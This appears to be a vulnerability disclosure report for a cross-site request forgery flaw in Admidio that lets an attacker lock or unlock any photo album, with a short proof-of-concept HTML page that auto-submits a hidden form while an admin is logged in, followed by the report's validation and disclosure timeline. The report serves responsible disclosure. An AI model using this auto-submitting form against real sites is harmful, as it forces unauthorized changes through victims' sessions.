Cross-Site Request Forgery lead to lock and unlock Album in admidio/admidio
Valid
Reported on
Jun 28th 2023
Description
Attacker able to lock or unlock any album with this CSRF attack.
Proof of Concept
- Admin already should be logged in browser
- Open the CSRF.html
<html>
<body>
<form action="http://localhost/adm_program/modules/photos/photo_album_function.php">
<input type="hidden" name="photo_uuid" value="b9131a9d-577e-4f06-b87e-5af30714b25b" />
<input type="hidden" name="mode" value="unlock" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
The album b9131a9d-577e-4f06-b87e-5af30714b25b
will be unlock
Acknowledge
Tran Van Nhan from bl4ckh0l3 of GalaxyOne
Impact
The attacker could potentially gain access to sensitive information if the photo album contains images with sensitive data.
Occurrences
We are processing your report and will contact the
admidio
team within 24 hours.
3 months ago
Tran Van Nhan modified the report
3 months ago
We have contacted a member of the
admidio
team and are waiting to hear back
3 months ago
The researcher's credibility has increased: +7
Markus Faßbender
has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on
Jul 16th 2023
photo_album_function.php#L193-L209
has been validated
Hi @maintainer. Could you assign a CVE identifier for this vulnerability?
to join this conversation